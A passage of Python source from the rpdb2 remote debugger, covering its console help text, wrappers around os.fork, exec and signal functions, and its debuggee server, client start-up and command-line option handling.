be - Enable a breakpoint.
bc - Clear (delete) a breakpoint.
bl - List all breakpoints.
load - Load session breakpoints.
save - save session breakpoints.
Misc:
-----
thread - Display threads or switch to a particular thread.
list - List source code.
stack - Display stack trace.
up - Go up one frame in stack.
down - Go down one frame in stack.
encoding - Set the source encoding used by exec and eval commands.
eval - Evaluate expression in the context of the current frame.
exec - Execute suite in the context of the current frame.
analyze - Toggle analyze last exception mode.
trap - Get or set "trap unhandled exceptions" mode.
fork - Get or set fork handling mode.
synchro - Get or set synchronicity mode.
License:
----------------
copyright - Print copyright notice.
license - Print license.
credits - Print credits information.
type help <topic> for futher information."""
self.print_notice(help_notice)
def help_copyright(self):
_print("""copyright
Print copyright notice.""", self.m_stdout)
def help_license(self):
_print("""license
Print license.""", self.m_stdout)
def help_credits(self):
_print("""credits
Print credits information.""", self.m_stdout)
def help_help(self):
_print("""help <cmd>
Print help for command <cmd>.
On the other hand I guess that you already know that, don't you?""", self.m_stdout)
def help_analyze(self):
_print("""analyze
(shorthand - a)
Toggle analyze last exception mode.
The following changes to the debugger behavior apply in analyze mode:
The debugger prompt changes to 'Analyze>'.
'go', 'step', 'next', and 'return' are not allowed.
'thread' does not allow to change the thread focus.
'stack' allows no arguments.
'list' does not accept the '*' (all threads) argument
'stack', 'list', 'eval', 'exec', 'up', and 'down' operate on the thrown
exception.""", self.m_stdout)
help_a = help_analyze
def help_password(self):
_print("""password <password>
Get or set the channel password.
Communication between the console and the debuggee is always authenticated and
optionally encrypted. The password (A secret known to the console and the
debuggee alone) governs both security methods. The password is never
communicated between the two components on the communication channel.
A password is always required since unsecured communication between the
console and the debuggee might expose your machine to attacks.""", self.m_stdout)
def help_remote(self):
_print("""remote [True | False]
Get or set "allow connections from remote machines" mode.
When set to False:
Newly launched debuggees will listen on localhost only. In this mode, debugger
consoles on remote machines will NOT BE able to see or attach to the debuggee.
When set to True:
Newly launched debuggees will listen on INADDR_ANY. In this mode, debugger
consoles on remote machines will BE able to see and attach to the debuggee.""", self.m_stdout)
def help_trap(self):
_print("""trap [True | False]
Get or set "trap unhandled exceptions" mode.
When set to False:
Debuggee will ignore unhandled exceptions.
When set to True:
Debuggee will pause on unhandled exceptions for inspection.""", self.m_stdout)
def help_synchro(self):
_print("""synchro [True | False]
Get or set the synchronicity mode.
Traditional Python debuggers that use the inspected thread
(usually the main thread) to query or modify the script
name-space have to wait until the script hits a break-point.
Synchronicity allows the debugger to query and modify the
script name-space even if its threads are still running or
blocked in C library code by using special worker threads.
In some rare cases querying or modifying data in
synchronicity can crash the script. For example in some
Linux builds of wxPython querying the state of wx objects
from a thread other than the GUI thread can crash the
script. If this happens or if you want to restrict these
operations to the inspected thread, turn synchronicity off.
Default is True.""", self.m_stdout)
def help_fork(self):
_print("""fork [parent | child] [manual | auto]
Get or set fork handling mode.
Without arguments returns the current mode.
When 'parent' is specified the debugger will continue to debug the original
parent process after a fork.
When 'child' is specified the debugger will switch to debug the forked
child process after a fork.
When 'manual' is specified the debugger will pause before doing a fork.
When 'auto' is specified the debugger will go through the fork without
pausing and will make the forking decision based on the parent/child
setting.
WARNING:
On some Posix OS such as FreeBSD, Stepping into the child fork
can result in termination of the child process since the debugger
uses threading for its operation and on these systems threading and
forking can conflict.
""", self.m_stdout)
def help_stop(self):
_print("""stop
Shutdown the debugged script.""", self.m_stdout)
def help_launch(self):
_print("""launch [-k] <script_name> [<script_args>]
Start script <script_name> and attach to it.
-k Don't change the current working directory. By default the working
directory of the launched script is set to its folder.""", self.m_stdout)
def help_restart(self):
_print("""restart
Restart a script with same arguments from last launch.""", self.m_stdout)
def help_attach(self):
_print("""attach [<arg>]
Without an argument, 'attach' prints the scripts available for debugging
on the selected host. To select a host use the 'host' command. A script is
considered available for debugging only if it is using the rpdb2 module or
has been executed by the debugger.
If the debugger is already attached to a script, a special character will
mark that script in the list.
When <arg> is an integer the debugger will try to attach to a script with
that pid.
When <arg> is a string the debugger will try to attach to a script
with that name in the list.""", self.m_stdout)
def help_detach(self):
_print("""detach
Detach from the script the debugger is currently attached to. The detached
script will continue execution.""", self.m_stdout)
def help_break(self):
_print("""break
(shorthand - b)
Request script to break (pause execution as if it hit a breakpoint).
The 'break' command returns immdeiately but the break is only established
when an active thread submits to the debugger control. If a thread is
doing a system call or executing C code, this will happen only when
it returns to do python code.""", self.m_stdout)
help_b = help_break
def help_bp(self):
_print("""bp [<filename>':'] (<line> | <scope>) [',' <expr>]
Set a breakpoint.
<filename> - either the filename or the module name.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.
<expr> - condition to evaluate in the context of the frame. If it
evaluates to 'True' the break point will break into the debugger.
In case the <filemame> is omitted, the current file is assumed. In this case
the debuggee has to be waiting at break point.
Examples:
bp test_file.py:20
bp test_file.py:MyClass.Foo
bp 304
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
def help_be(self):
_print("""be (<id_list> | '*')
Enable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - Enable all breakpoints.""", self.m_stdout)
def help_bd(self):
_print("""bd (<id_list> | '*')
Disable breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - disable all breakpoints.""", self.m_stdout)
def help_bc(self):
_print("""bc (<id_list> | '*')
Clear (delete) breakpoints.
<id_list> - is a space delimited list of at least one breakpoint id
'*' - clear all breakpoints.""", self.m_stdout)
def help_bl(self):
_print("""bl
List all breakpoints, sorted by their id.""", self.m_stdout)
def help_load(self):
_print("""load [<filename>]
Load breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_save(self):
_print("""save [<filename>]
save breakpoints.
<filename> - optional breakpoints filename. The filename should not include
a file extension.""", self.m_stdout)
def help_go(self):
_print("""go [[<filename>':'] (<line> | <scope>)]
(shorthand - g)
Resume execution of a script that is waiting at break point.
If an argument is present, continue execution until that argument is reached.
<filename> - is the file name which basically is the script's name without
the '.py' extension.
<line> - is the line number to assign the breakpoint to.
<scope> - is a "fully qualified" function name. That is, not only the
function name but also the class name (in case of a member
function), such as MyClass.MyMemberFunction.""", self.m_stdout)
help_g = help_go
def help_exit(self):
_print("""exit
Exit the debugger. If the debugger is attached to a script, the debugger
will attempt to detach from the script first.""", self.m_stdout)
help_EOF = help_exit
def help_host(self):
_print("""host [<arg>]
Without an argument, 'host' prints the current selected host.
With an argument <arg>, 'host' attempts to resolve <arg> to a known ip
address or a domain name. If it is successful, that host will become the
selected host.
The default selected host is the local host.
Subsequent 'attach' commands will be done on the selected host.
Type 'help attach' for more information.""", self.m_stdout)
def help_stack(self):
_print("""stack [<tid> | '*']
(shorthand - k)
Without an argument, 'stack' prints the stack trace of the focused thread.
If the thread is waiting at break point a special character will mark the
focused frame.
<tid> - print the stack of thread <tid>
'*' - print the stacks of all active threads.
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_k = help_stack
def help_list(self):
_print("""list [<file_name>:][<line_no> | '+' | '-' | '^' | '*'] [',' <nlines>]
(shorthand - l)
Without an argument, 'list' prints the source lines around the current line
of the focused thread in the focused frame. A special character sequence will
mark the current line according to the event:
'C>' - call - A function is called.
'L>' - line - The interpreter is about to execute a new line of code.
'R>' - return - A function is about to return.
'E>' - exception - An exception has been thrown.
'*>' - running - The thread is running.
If a breakpoint is assigned to a line, that line will be marked with:
'B' - if the breakpoint is enabled
'D' - if the breakpoint is disabled
<file_name> - List source from filename
<line_no> - Print the source lines around that line number in the same file
of the current line.
'+' - Print the next lines in the file.
'-' - Print the previous lines in the file.
'^' - Print the entire file.
'*' - Print the source lines for each of the active threads.
<nlines> - Print <nlines> of source
Type 'help break' for more information on breakpoints and threads.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_l = help_list
def help_thread(self):
_print("""thread [<no> | <tid>]
(shorthand - t)
Without an argument, 'thread' prints the list of known active threads, with
their corresponding state, which can be either 'running' or
'waiting at break point'. A special character will mark the focused thread.
With an argument <tid>, 'thread' will attempt to set the debugger focus to
the thread of that tid.
With an argument <no>, 'thread' will attempt to set the debugger focus to
the thread of that order in the thread list.
Type 'help break' for more information on breakpoints and threads.""", self.m_stdout)
help_t = help_thread
def help_jump(self):
_print("""jump <lineno>
(shorthand - j)
Jump to line <lineno> in the current scope.""", self.m_stdout)
help_j = help_jump
def help_next(self):
_print("""next
(shorthand - n)
Continue execution until the next line in the current function
is reached or it returns.""", self.m_stdout)
help_n = help_next
def help_step(self):
_print("""step
(shorthand - s)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current function).""", self.m_stdout)
help_s = help_step
def help_return(self):
_print("""next
(shorthand - r)
Continue execution until the current function returns.""", self.m_stdout)
help_r = help_return
def help_up(self):
_print("""up
move the debugger focus one frame up the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_down(self):
_print("""down
move the debugger focus one frame down the stack of the debugged thread
(closer to the current, most recently executed frame). Evaluation of
expressions or execution of statements will be done at the local and global
name spaces of the focused frame.
Type 'help eval' for more information on evaluation of expressions.
Type 'help exec' for more information on execution of statements.""", self.m_stdout)
def help_eval(self):
_print("""eval <expr>
(shorthand - v)
Evaluate the python expression <expr> under the global and local name spaces
of the currently focused frame.
Example:
'eval locals()' - will display the dictionary of the local variables.
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_v = help_eval
def help_exec(self):
_print("""exec <stmt>
(shorthand - x)
Execute the python suite <stmt> under the global and local name spaces
of the currently focused frame.
Example:
'exec i += 1'
IMPORTANT: Any changes to the global name space will be discarded unless the
focused stack frame is the top most frame.
Type 'help up' or 'help down' for more information on focused frames.""", self.m_stdout)
help_x = help_exec
def help_encoding(self):
_print("""encoding [<encoding> [, raw]]
Set the source encoding for the exec and eval commands.
Without an argument returns the current encoding.
The specified encoding can be either 'auto' or any encoding accepted
by the codecs module. If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8 by default.
The default encoding value is 'auto'.
If 'raw' is specified, strings returned by the eval command
will represent non ASCII characters as an escape sequence.""", self.m_stdout)
def help_env(self):
_print("""env [-d key | key = value]
Set the environment variables mapping. This mapping is used
when a new script is launched to modify its environment.
Example for a mapping on Windows:
env Path = %Path%;c:\\mydir
Example for a mapping on Linux:
env PATH = $PATH:~/mydir
To delete the mapping for PATH
env -d PATH
Without an argument returns the current list of mappings.
Note that the mapping will be evaluated and used to modify
the environment after the debugger engine at the debuggee
has imported the modules it requires. The order in which the
mappings will be evaluated and applied is:
last set, last evaluated.""", self.m_stdout)
#
# ---------------------------------------- Replacement Functions ------------------------------------
#
def rpdb2_import_wrapper(*args, **kwargs):
if len(args) > 0:
name = args[0]
elif 'name' in kwargs:
name = kwargs['name']
else:
return g_import(*args, **kwargs)
if name in sys.modules:
return g_import(*args, **kwargs)
#
# rpdb2 avoids stepping through this
# function (rpdb2_import_wrapper) to
# prevent confusion when stepping into
# an import statement.
#
m = g_import(*args, **kwargs)
if name != 'gtk':
return m
try:
m.gdk.threads_init()
return m
except:
pass
try:
m.threads_init()
return m
except:
pass
return m
g_import = None
if __name__ == 'rpdb2' and g_builtins_module.__import__ != rpdb2_import_wrapper:
g_import = g_builtins_module.__import__
g_builtins_module.__import__ = rpdb2_import_wrapper
def __find_eval_exec_frame_in_stack():
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and name in ['_evaluate', '_execute'] and 'redirect_exc_info' in f.f_locals:
return f
f = f.f_back
return None
def __exc_info():
f = __find_eval_exec_frame_in_stack()
if f == None:
return g_sys_exc_info()
try:
frame_index = f.f_locals['frame_index']
fException = f.f_locals['fException']
e = g_debugger.get_exception(frame_index, fException)
exc_info = (e['type'], e['value'], e['traceback'])
return exc_info
except:
return g_sys_exc_info()
g_sys_exc_info = None
if __name__ == 'rpdb2' and 'exc_info' in dir(sys) and sys.exc_info != __exc_info:
g_sys_exc_info = sys.exc_info
sys.exc_info = __exc_info
def __setrecursionlimit(rl):
global g_recursionlimit
print_debug('rl = %d' % rl)
g_recursionlimit = max(rl, 64)
rl = g_recursionlimit
if sys.version_info[:2] == (2, 6):
rl *= 3
return g_sys_setrecursionlimit(rl + 64)
g_sys_setrecursionlimit = None
if __name__ == 'rpdb2' and 'setrecursionlimit' in dir(sys) and sys.setrecursionlimit != __setrecursionlimit:
g_sys_setrecursionlimit = sys.setrecursionlimit
sys.setrecursionlimit = __setrecursionlimit
__setrecursionlimit(sys.getrecursionlimit())
def __find_debugger_frame():
frame = None
f = sys._getframe(0)
while f != None:
filename = f.f_code.co_filename
name = f.f_code.co_name
if DEBUGGER_FILENAME in filename and (name.startswith('trace_dispatch') or name == 'profile'):
frame = f
f = f.f_back
return frame
class CSignalHandler:
def __del__(self):
while len(g_signals_pending) != 0:
(handler, signum, frameobj) = g_signals_pending.pop(0)
print_debug('Handling pending signal: %s, %s' % (repr(signum), repr(frameobj)))
try:
handler(signum, frameobj)
except:
#
# Can not raise from inside a destructor. Report that handler
# exception will be ignored.
#
(t, v, tb) = sys.exc_info()
_t = safe_repr(t)
if _t.startswith("<type '"):
_t = _t.split("'")[1]
event = CEventSignalException(signum, '%s: %s' % (_t, safe_repr(v)))
g_debugger.m_event_dispatcher.fire_event(event)
def signal_handler(signum, frameobj):
frame = __find_debugger_frame()
if frame == None:
#
# A debugger tracing frame was not found in the stack.
# This means that the handler can be run without risk
# for state corruption.
#
handler = signal.getsignal(signum)
return handler(signum, frameobj)
if frame.f_code.co_name == 'profile' and frame.f_locals['event'] != 'return':
#
# signal was caught inside the profile hook but not while
# doing some debugger stuff. Call the handler but in case
# of exception schedule the debugger to re-enable the
# profile hook.
#
try:
handler = signal.getsignal(signum)
return handler(signum, frameobj)
except:
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.set_tracers(fsignal_exception = True)
raise
#
# Set the handler to be run when the debugger is about
# to return from the tracing code.
#
print_debug('Intercepted signal: %s, %s' % (repr(signum), repr(frameobj)))
f = frameobj
while f != None:
if f == frame:
frameobj = frame.f_back
break
f = f.f_back
handler = signal.getsignal(signum)
g_signals_pending.append((handler, signum, frameobj))
if not 'signal_handler' in frame.f_locals:
frame.f_locals.update({'signal_handler': CSignalHandler()})
event = CEventSignalIntercepted(signum)
g_debugger.m_event_dispatcher.fire_event(event)
if signum == signal.SIGINT and g_debugger.is_waiting_for_attach():
g_debugger.set_request_go_timer(0)
def __getsignal(signum):
handler = g_signal_handlers.get(signum, g_signal_getsignal(signum))
return handler
g_signal_getsignal = None
if __name__ == 'rpdb2' and 'getsignal' in dir(signal) and signal.getsignal != __getsignal:
g_signal_getsignal = signal.getsignal
signal.getsignal = __getsignal
def __signal(signum, handler):
old_handler = __getsignal(signum)
if handler in [signal.SIG_IGN, signal.SIG_DFL]:
g_signal_signal(signum, handler)
return old_handler
g_signal_signal(signum, signal_handler)
g_signal_handlers[signum] = handler
return old_handler
g_signal_signal = None
if __name__ == 'rpdb2' and 'signal' in dir(signal) and signal.signal != __signal:
g_signal_signal = signal.signal
signal.signal = __signal
"""
def __setprofile(foo):
global g_profile
print_debug('*** setprofile to %s' % repr(foo))
traceback.print_stack(file = sys.__stderr__)
if thread_get_name(current_thread()) == 'MainThread':
g_profile = foo
g_sys_setprofile(foo)
g_sys_setprofile = None
if __name__ == 'rpdb2' and sys.setprofile != __setprofile:
g_sys_setprofile = sys.setprofile
sys.setprofile = __setprofile
"""
def __fork():
global g_forktid
if not g_fignorefork:
g_forktid = setbreak()
#
# os.fork() has been called.
#
# You can choose if you would like the debugger
# to continue with the parent or child fork with
# the 'fork' console command.
#
# For example: 'fork child' or 'fork parent'
# Type: 'help fork' for more information.
#
# WARNING:
# On some Posix OS such as FreeBSD,
# Stepping into the child fork can result in
# termination of the child process.
#
# *** RPDB2 SAYS: Read the entire comment! ***
#
return g_os_fork()
g_os_fork = None
if __name__ == 'rpdb2' and 'fork' in dir(os) and os.fork != __fork:
g_os_fork = os.fork
os.fork = __fork
def __exit(n):
global g_fos_exit
if type(n) == int:
g_fos_exit = (setbreak() != None)
#
# os._exit(n) has been called.
#
# Stepping on from this point will result
# in program termination.
#
return g_os_exit(n)
g_os_exit = None
if __name__ == 'rpdb2' and '_exit' in dir(os) and os._exit != __exit:
g_os_exit = os._exit
os._exit = __exit
def __close(fd):
global g_fos_exit
try:
if fd == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.close(fd) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_close(fd)
g_os_close = None
if __name__ == 'rpdb2' and 'close' in dir(os) and os.close != __close:
g_os_close = os.close
os.close = __close
def __dup2(fd, fd2):
global g_fos_exit
try:
if fd2 == g_server.m_server.socket._sock.fileno():
g_fos_exit = (setbreak() != None)
except:
pass
#
# os.dup2(fd, fd2) has been called by the debugged script to close
# the debugger communication channel.
#
# This can normally happen if it is trying to spawn a new process
# in its place.
#
# Stepping on from this point will result in termination of the
# debugging session.
#
return g_os_dup2(fd, fd2)
g_os_dup2 = None
if __name__ == 'rpdb2' and 'dup2' in dir(os) and os.dup2 != __dup2:
g_os_dup2 = os.dup2
os.dup2 = __dup2
def __execv(path, args):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execv() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execv(path, args)
g_os_execv = None
if __name__ == 'rpdb2' and 'execv' in dir(os) and os.execv != __execv:
g_os_execv = os.execv
os.execv = __execv
def __execve(path, args, env):
global g_exectid
if os.path.isfile(path) and not g_fignorefork:
g_exectid = setbreak()
#
# os.execve() has been called.
#
# Stepping on from this point will result
# in termination of the debug session if
# the exec operation completes successfully.
#
return g_os_execve(path, args, env)
g_os_execve = None
if __name__ == 'rpdb2' and 'execve' in dir(os) and os.execve != __execve:
g_os_execve = os.execve
os.execve = __execve
def __excepthook(type, value, traceback, next_excepthook, index):
if index + 1 < len(g_excepthooks):
return next_excepthook(type, value, traceback)
if traceback.tb_frame.f_back == None:
return next_excepthook(type, value, traceback)
if not g_debugger.m_ftrap:
return next_excepthook(type, value, traceback)
settrace()
ctx = g_debugger.get_ctx(thread.get_ident())
ctx.m_fUnhandledException = True
setbreak()
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return next_excepthook(type, value, traceback)
g_excepthooks = []
g_excepthook = None
#
# Set the debugger hook for unhandled exceptions. It only kicks in on
# unhandled exceptions that are declared unhandled in the middle of the
# stack as in wxPython. Normally unhandled exceptions are trapped at the
# last stack frame by another mechanism.
#
# This mechaism is designed to work even if the excepthook is over-written.
# by the debugged script.
#
def set_excepthook():
global g_excepthook
if len(g_excepthooks) >= 4:
#
# Give up. We have been over-written 4 times already.
#
return
next_excepthook = sys.excepthook
index = len(g_excepthooks)
eh = lambda type, value, traceback: __excepthook(type, value, traceback, next_excepthook, index)
g_excepthooks.append(eh)
g_excepthook = eh
sys.excepthook = eh
def __function_wrapper(function, args, kwargs):
__settrace(depth = 1)
#
# Debuggee breaks (pauses) here
# on unhandled exceptions.
# Use analyze mode for post mortem.
# type 'help analyze' for more information.
#
return function(*args, **kwargs)
def __start_new_thread(function, args, kwargs = {}):
return g_thread_start_new_thread(__function_wrapper, (function, args, kwargs))
g_thread_start_new_thread = None
if __name__ == 'rpdb2' and 'start_new_thread' in dir(thread) and thread.start_new_thread != __start_new_thread:
g_thread_start_new_thread = thread.start_new_thread
thread.start_new_thread = __start_new_thread
#
# ---------------------------------------- main ------------------------------------
#
def __settrace(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
def __setbreak(depth = 2):
if g_debugger is None:
return
f = sys._getframe(depth)
g_debugger.setbreak(f)
return thread.get_ident()
def __set_temp_breakpoint(path, scopename, lineno):
return g_debugger.m_bp_manager.set_temp_breakpoint(path, scopename, lineno)
def _atexit(fabort = False):
if g_fignore_atexit:
return
print_debug("Entered _atexit() in pid %d" % _getpid())
if g_debugger is None:
return
if not fabort:
g_debugger.stoptrace()
g_debugger.send_event_exit()
time.sleep(1.0)
g_server.shutdown()
g_debugger.shutdown()
if not fabort:
return
if hasattr(os, 'kill') and hasattr(signal, 'SIGKILL'):
os.kill(os.getpid(), signal.SIGKILL)
else:
os.abort()
def my_pickle_import(*args, **kwargs):
name = ''
if len(args) > 0:
name = args[0]
if 'name' in kwargs:
name = kwargs['name']
if name == 'rpdb2':
return
return __import__(*args, **kwargs)
#
# MOD
#
def workaround_import_deadlock():
if is_py3k() and hasattr(pickle, '_Pickler'):
pickle.Pickler = pickle._Pickler
xmlrpclib.loads(XML_DATA)
s = as_bytes("(S'hello'\np0\nS'world'\np1\ntp2\n.")
#s = as_bytes('(S\'\\xb3\\x95\\xf9\\x1d\\x105c\\xc6\\xe2t\\x9a\\xa5_`\\xa59\'\np0\nS"(I0\\nI1\\nS\'5657827\'\\np0\\n(S\'server_info\'\\np1\\n(tI0\\ntp2\\ntp3\\n."\np1\ntp2\n.0000000')
pickle.loads(s)
pickle.__import__ = my_pickle_import
def __start_embedded_debugger(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, timeout, source_provider, fDebug, depth):
global g_server
global g_debugger
global g_fDebug
global g_initial_cwd
global g_source_provider_aux
_rpdb2_pwd = as_unicode(_rpdb2_pwd)
try:
g_server_lock.acquire()
if g_debugger is not None and timeout == 0:
f = sys._getframe(depth)
g_debugger.settrace(f, f_break_on_init = False)
return
if g_debugger is not None:
f = sys._getframe(depth)
g_debugger.record_client_heartbeat(0, True, False)
g_debugger.setbreak(f)
return
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument(STR_PASSWORD_BAD)
g_fDebug = fDebug
g_source_provider_aux = source_provider
workaround_import_deadlock()
if (not fAllowUnencrypted) and not is_encryption_supported():
raise EncryptionNotSupported
f = sys._getframe(depth)
filename = calc_frame_path(f)
#
# This is an attempt to address the Python problem of recording only
# relative paths in __file__ members of modules in the following case.
#
if sys.path[0] == '':
try:
g_initial_cwd = [getcwd(), getcwdu()]
except UnicodeDecodeError:
#
# This exception can be raised in py3k (alpha) on nt.
#
g_initial_cwd = [getcwdu()]
atexit.register(_atexit)
g_debugger = CDebuggerEngine(fembedded = True)
g_server = CDebuggeeServer(filename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote)
g_server.start()
if timeout == 0:
g_debugger.settrace(f, f_break_on_init = False)
return
g_debugger.settrace(f, timeout = timeout)
finally:
g_server_lock.release()
def StartServer(args, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid):
assert(is_unicode(_rpdb2_pwd))
global g_server
global g_debugger
global g_module_main
try:
ExpandedFilename = FindFile(args[0])
_path = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
if fchdir:
os.chdir(os.path.dirname(_path))
if ExpandedFilename in g_found_unicode_files:
prefix = os.path.join(getcwdu(), '')
_path = _path.replace(winlower(prefix), '')
except IOError:
_print('File ' + args[0] + ' not found.')
return
print_debug('Starting server with: %s' % ExpandedFilename)
workaround_import_deadlock()
#
# Replace the rpdb2.py directory with the script directory in
# the search path
#
spe = ExpandedFilename
if os.path.islink(ExpandedFilename):
spe = os.path.realpath(ExpandedFilename)
sys.path[0] = os.path.dirname(spe)
encoding = detect_locale()
argv = [as_string(arg, encoding) for arg in args]
sys.argv = argv
atexit.register(_atexit)
g_debugger = CDebuggerEngine()
g_server = CDebuggeeServer(ExpandedFilename, g_debugger, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, rid)
g_server.start()
try:
g_debugger.m_bp_manager.set_temp_breakpoint(ExpandedFilename, '', 1, fhard = True)
except:
pass
f = sys._getframe(0)
g_debugger.settrace(f, f_break_on_init = False, builtins_hack = ExpandedFilename)
g_module_main = -1
del sys.modules['__main__']
#
# An exception in this line occurs if
# there is a syntax error in the debugged script or if
# there was a problem loading the debugged script.
#
imp.load_source('__main__', _path)
def StartClient(command_line, fAttach, fchdir, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
assert(is_unicode(command_line))
assert(_rpdb2_pwd == None or is_unicode(_rpdb2_pwd))
if (not fAllowUnencrypted) and not is_encryption_supported():
_print(STR_ENCRYPTION_SUPPORT_ERROR)
return 2
sm = CSessionManager(_rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host)
c = CConsole(sm)
c.start()
time.sleep(1.0)
try:
if fAttach:
sm.attach(command_line)
elif command_line != '':
sm.launch(fchdir, command_line)
except (socket.error, CConnectionException):
sm.report_exception(*sys.exc_info())
except CException:
sm.report_exception(*sys.exc_info())
except:
sm.report_exception(*sys.exc_info())
print_debug_exception(True)
c.join()
sm.shutdown()
def PrintUsage(fExtended = False):
scriptName = os.path.basename(sys.argv[0])
_print(""" %(rpdb)s [options] [<script-name> [<script-args>...]]
%(rpdb)s uses the client-server model where the debugger UI/console is
the client and the debugged script is the server (also called debuggee).
The client and the server are separate processes and communicate over
sockets.
Example: The following command starts the debugger UI/console and then
launches and attaches to the specified script:
%(rpdb)s some_script.py
Options can be a combination of the following:
-h, --help Print this help.
-d, --debuggee Start the debugged script (server) and wait for a
debugger console (client) to attach.
-a, --attach Start the debugger console (client) and attach to the
specified debugged script (server).
-o, --host= Specify host (or IP address) for remote connections.
-r, --remote Allow debuggees to accept connections from remote machines.
-e, --encrypt Force encrypted socket communication.
-p, --pwd= Specify password for socket communication.
This flag is available only on Windows. On other
systems the password will be queried interactively
if it is needed.
-s, --screen Use the Unix screen utility when starting the debuggee.
Note that the debugger should be started as follows:
screen rpdb2 -s [options] [<script-name> [<script-args>...]]
-c, --chdir Change the working directory to that of the launched
script.
-v, --version Print version information.
--debug Debug prints.
Note that each option is available in short form (example -e) and in a
long form (example --encrypt).
Options that end with '=' accept an argument that should follow without
a space. For example to specify 192.168.0.10 as host use the following
option:
long form: --host=192.168.0.10
short form: -o192.168.0.10
""" % {"rpdb": scriptName})
if not fExtended:
return
_print(__doc__)
def main(StartClient_func = StartClient, version = RPDB_TITLE):
global g_fScreen
global g_fDebug
global g_fFirewallTest
create_rpdb_settings_folder()
encoding = detect_locale()
argv = [as_unicode(arg, encoding) for arg in sys.argv]
try:
options, _rpdb2_args = getopt.getopt(
argv[1:],
'hdao:rtep:scv',
['help', 'debugee', 'debuggee', 'attach', 'host=', 'remote', 'plaintext', 'encrypt', 'pwd=', 'rid=', 'screen', 'chdir', 'base64=', 'nofwtest', 'version', 'debug']
)
except getopt.GetoptError:
PrintUsage()
return 2
fWrap = False
fAttach = False
fSpawn = False
fStart = False
encoded_path = None
secret = None
host = None
_rpdb2_pwd = None
fchdir = False
fAllowRemote = False
fAllowUnencrypted = True
for o, a in options:
if o in ['-h', '--help']:
PrintUsage()
return 0
if o in ['-v', '--version']:
_print(version)
return 0
if o in ['--debug']:
g_fDebug = True
if o in ['-d', '--debugee', '--debuggee']:
fWrap = True
if o in ['-a', '--attach']:
fAttach = True
if o in ['-o', '--host']:
host = a
if o in ['-r', '--remote']:
fAllowRemote = True
if o in ['-t', '--plaintext']:
fAllowUnencrypted = True
if o in ['-e', '--encrypt']:
fAllowUnencrypted = False
if o in ['-p', '--pwd']:
_rpdb2_pwd = a
if o in ['--rid']:
secret = a
if o in ['-s', '--screen']:
g_fScreen = True
if o in ['-c', '--chdir']:
fchdir = True
if o in ['--base64']:
encoded_path = a
if o in ['--nofwtest']:
g_fFirewallTest = False
arg = None
argv = None
options = None
o = None
a = None
if (_rpdb2_pwd is not None) and (os.name != 'nt'):
_print(STR_PASSWORD_NOT_SUPPORTED)
return 2
if _rpdb2_pwd is not None and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_BAD)
return 2
if fWrap and (len(_rpdb2_args) == 0):
_print("--debuggee option requires a script name with optional <script-arg> arguments")
return 2
if fWrap and fAttach:
_print("--debuggee and --attach can not be used together.")
return 2
if fAttach and (len(_rpdb2_args) == 0):
_print("--attach option requires a script name to attach to.")
return 2
if fAttach and (len(_rpdb2_args) > 1):
_print("--attach option does not accept <script-arg> arguments.")
return 2
if fAttach and fAllowRemote:
_print("--attach and --remote can not be used together.")
return 2
if (host is not None) and not fAttach:
_print("--host can only be used together with --attach.")
return 2
if host is None:
host = LOCALHOST
fSpawn = (len(_rpdb2_args) != 0) and (not fWrap) and (not fAttach)
fStart = (len(_rpdb2_args) == 0)
if fchdir and not (fWrap or fSpawn):
_print("-c can only be used when launching or starting a script from command line.")
return 2
assert (fWrap + fAttach + fSpawn + fStart) == 1
if fAttach and (os.name == POSIX):
try:
int(_rpdb2_args[0])
_rpdb2_pwd = read_pwd_file(_rpdb2_args[0])
delete_pwd_file(_rpdb2_args[0])
except (ValueError, IOError):
pass
if (secret is not None) and (os.name == POSIX):
_rpdb2_pwd = read_pwd_file(secret)
if (fWrap or fAttach) and not is_valid_pwd(_rpdb2_pwd):
_print(STR_PASSWORD_MUST_BE_SET)
while True:
_rpdb2_pwd = _raw_input(STR_PASSWORD_INPUT)
if is_valid_pwd(_rpdb2_pwd):
break
_print(STR_PASSWORD_BAD)
_print(STR_PASSWORD_CONFIRM)
if fWrap or fSpawn:
try:
if encoded_path != None:
_b = as_bytes(encoded_path).translate(g_safe_base64_from)
